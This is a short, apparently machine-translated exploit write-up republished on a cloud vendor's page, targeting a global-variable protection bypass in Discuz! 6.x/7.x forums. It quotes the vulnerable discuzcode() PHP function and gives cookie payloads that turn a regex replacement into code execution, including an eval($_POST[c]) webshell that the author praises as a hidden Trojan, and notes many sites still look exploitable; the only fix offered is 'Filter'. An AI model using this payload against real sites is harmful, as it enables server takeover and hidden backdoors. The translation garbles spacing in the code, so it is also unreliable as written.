Discuz! Command Execution for two versions of foreground Products

Source: Internet
Author: User

Discuz! Command Execution for two versions of foreground Products

Affected Version: Discuz! 6. x/7.x global variable protection Bypass Vulnerability


The Internet has been relatively public, see: http://www.bkjia.com/Article/201005/47360.html

Description: Discuz! 6. x/7.x global variable defense Bypass Vulnerability POC: Missing



It may be because the author did not release the POC, so it was not taken seriously by others.

This vulnerability is exploited in many places, so this command is not restricted.



The vulnerability principle is not mentioned. Here we will talk about the vulnerability utilization:

File:

Include/discuzcode. func. php


function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, $allowsmilies = 1, $allowbbcode = 1, $allowimgcode = 1, $allowhtml = 0, $jammer = 0, $parsetype = '0', $authorid = '0', $allowmediacode = '0', $pid = 0) {global $discuzcodes, $credits, $tid, $discuz_uid, $highlight, $maxsmilies, $db, $tablepre, $hideattach, $allowattachurl;if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($message, '[/code]') || strpos($message, '[/CODE]')) !== FALSE) {$message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ies", "codedisp('\\1')", $message);}$msglower = strtolower($message);//$htmlon = $htmlon && $allowhtml ? 1 : 0;if(!$htmlon) {$message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer()", dhtmlspecialchars($message)) : dhtmlspecialchars($message);}if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {if(!$discuzcodes['smiliesreplaced']) {foreach($GLOBALS['_DCACHE']['smilies']['replacearray'] AS $key => $smiley) {$GLOBALS['_DCACHE']['smilies']['replacearray'][$key] = '';}$discuzcodes['smiliesreplaced'] = 1;}$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);}



Note Row 3:

$ Message = preg_replace ($ GLOBALS ['_ DCACHE'] ['smilies '] ['searcharray'], $ GLOBALS ['_ dcache'] ['smilies'] ['replacearray'], $ message, $ maxsmilies );



Therefore

GLOBALS [_ DCACHE] [smilies] [searcharray] =/. */eui; GLOBALS [_ DCACHE] [smilies] [replacearray] = phpinfo ();



.

Cookie band in request

GLOBALS [_ DCACHE] [smilies] [searcharray] = /. */eui; GLOBALS [_ DCACHE] [smilies] [replacearray] = eval ($ _ POST [c]) % 3B;

That is to say, a Trojan Horse is hidden and cannot be easily discovered.



I tried google to verify it and found that there are still a lot of tricks.

 

 






 

 

Solution:

Filter

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.